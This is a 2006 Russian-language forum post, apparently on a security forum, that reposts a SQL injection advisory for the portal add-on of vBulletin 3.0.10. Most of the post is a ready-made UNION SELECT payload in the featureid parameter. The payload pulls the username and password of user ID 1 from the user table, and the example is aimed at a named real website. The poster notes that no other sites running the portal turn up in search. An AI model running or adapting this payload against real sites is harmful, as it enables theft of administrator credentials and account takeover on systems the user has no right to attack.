01.06.2006, 14:29
|
|
Познающий
Регистрация: 22.10.2005
Сообщений: 37
Провел на форуме:
520745
Репутация:
141
|
|
Уязвимость в портале vBulletin Version 3.0.10
################################################## ####
# vBulletin 3.0.10 Version SQL Injection #
# SpC-x #
################################################## ####
# Credit : SpC-X #
# Site : http://www.Cyber-security.org #
################################################## ####
Code :
http://www.target.com/path/portal.ph...ure&featureid=[SQL]
Example :
http://ckknight.wowinterface.com/por...ture&featureid
=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,
password/**/from/**/user/**/where/**/userid=1/*
/SpC-x Источник
Других форумов с установленным порталом гугль не выдаёт.
PS Формально, уязвимость в портале, а не в форуме, поэтому заранее извиняюсь, если запостил не туда.
Последний раз редактировалось pch; 01.06.2006 в 14:34..
|
|
|